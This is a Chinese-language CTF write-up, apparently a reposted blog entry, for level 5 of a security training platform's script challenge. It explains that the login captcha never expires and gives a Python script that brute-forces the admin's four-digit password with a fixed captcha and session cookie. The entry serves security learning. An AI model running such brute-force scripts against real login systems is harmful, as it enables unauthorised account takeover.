网络信息安全学习平台脚本关-第五关
来源:互联网 发布:软件开发组织架构 编辑:程序博客网 时间:2024/06/11 08:47
脚本关之逗比验证码第一期:地址
这道题模拟登陆页面,查看源代码发现有,username, pwd ,vcode,
其中username已经给出,且提示pwd为四位数的数字,下面有验证码
用python写一个脚本自动的跑1000~10000的密码,暴力破解,据说验证码不会过期所以,获取一个验证码之后一直用这个验证码然后跑密码登陆,获取返回的页面,直到返回页面没有错误,则说明得到了密码,至于验证码为什么不过期由于做这个题的目的是学习python,所以就不关心了
注意:除了data,还需要设置headers中的cookie,否则提示
代码:
#coding: gbk#coding: utf-8import urllibimport urllib2import reurl = "http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php"for pwd in range(1000,10000): values = {'username': 'admin', 'pwd': pwd, 'vcode': 'BAKD'} data = urllib.urlencode(values) header = {'Cookie': 'PHPSESSID=dc4adc828abed413e7d164ac9af7ef33'} req = urllib2.Request(url, data, headers=header) res = urllib2.urlopen(req) content = unicode(res.read(), 'utf-8').encode('gbk') if 'error' in content: print 'try:', pwd else: print 'right pwd:', pwd print content break;
结果:
0 0
- 网络信息安全学习平台脚本关-第五关
- 网络信息安全攻防实验室 脚本关第五关
- 网络信息安全学习平台---脚本关第2题
- 网络信息安全学习平台---脚本关第14题
- 网络信息安全学习平台---脚本关第15题
- 网络信息安全攻防学习平台-脚本关 writeup
- 网络信息安全攻防平台 脚本关第一关
- 网络信息安全攻防平台脚本关快速口算
- 网络信息安全学习平台---注入关第3题
- 网络信息安全学习平台--注入关第5题
- 网络信息安全学习平台---注入关第7题
- 网络信息安全学习平台---解密关第5题
- 网络信息安全学习平台---解密关第9题
- 网络信息安全攻防学习平台——基础关
- 网络信息安全攻防学习平台基础关
- 网络信息安全攻防学习平台上传关
- 网络信息安全攻防实验室 脚本关第二关
- 网络信息安全攻防实验室 脚本关第六关
- 图解SQL的Join
- Centos 6.5更换yum的源为阿里和网易的源
- Hive 6. 数据库操作
- 使用pyhton采用多线程方式ping IP
- php五大运行模式CGI,FAST-CGI,CLI,ISAPI,APACHE模式浅谈
- 网络信息安全学习平台脚本关-第五关
- oracle 时间操作
- 理解try-with-resources语句及示例
- PHP---禁用缓存和文件下载
- 312. Burst Balloons[hard]
- Java 错误:找不到或无法加载主类
- FreeMarker标签与使用
- 排序算法---选择排序&堆排序&冒泡排序
- 2 gradle 构建 和运行task